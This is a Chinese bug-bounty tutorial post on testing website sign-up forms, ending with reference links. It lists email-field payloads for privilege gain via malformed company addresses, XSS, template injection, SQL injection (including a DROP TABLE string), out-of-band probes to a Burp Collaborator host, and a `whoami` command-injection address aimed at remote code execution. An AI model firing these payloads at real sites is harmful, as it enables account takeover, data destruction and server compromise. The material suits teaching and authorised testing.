赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
本文承接前文赏金猎人系列-如何测试注册(Sign up)功能,继续梳理注册功能的测试流程,相关文章还有:
注册的时候尝试利用带有空格的公司邮箱地址来注册,比方说: "[email protected] "
(注意:com后面有一个空格)
可能会发现一些意向不到的情况(可能会发现有额外的权限)
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
firstname=I&lastname=am&[email protected] &password=*****&captcha=Random&token=CSRF
注册公司邮件的时候尝试用大写的邮件,例如[email protected]
,可能获取额外的权限或获得更多的功能
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Numberfirstname=I&lastname=am&[email protected] &password=*****&captcha=Random&token=CSRF
邮件写成以下形式,你可能会有意想不到的发现:
[email protected]@company.com
me+(@gmail.com)@company.com
"[email protected]"@company.com
"<[email protected]>"@company.com
"[email protected];"@company.com
"[email protected]+"@company.com
和上面tips类似,将gmail用googlemail.com 来替代
[email protected]@company.com
me+(@googlemail.com)@company.com
"[email protected]"@company.com
"<[email protected]>"@company.com
"[email protected];"@company.com
"[email protected]+"@company.com
尝试使用以下payload,看是否能造成xss,ssti或者sqli
me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
[email protected](<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
%@gmail.com
尝试用以下payload获取后台信息或者内部IPs
[email protected]
[email protected][id.collaborator.net]
user(;[email protected])@gmail.com
[email protected](@gmail.com)
me+(@gmail.com)@id.collaborator.net
<[email protected]>[email protected]
有时候系统在发送之前会ping你的主机,可以尝试利用带有注入系统命令的Burp Collaborator的邮件地址来实现rce
如下所示
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Numberfirstname=I&lastname=am&[email protected]`whoami`.id.collaborat or.net&password=********&captcha=Random&token=CSRF
http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate
https://www.youtube.com/watch?v=cThFNXrBYQU
https://www.youtube.com/watch?v=cbJ4NSYsUto
https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17
https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses
了解更多的技术与学习视频教程可以关注公众号。
github.com/hiadragon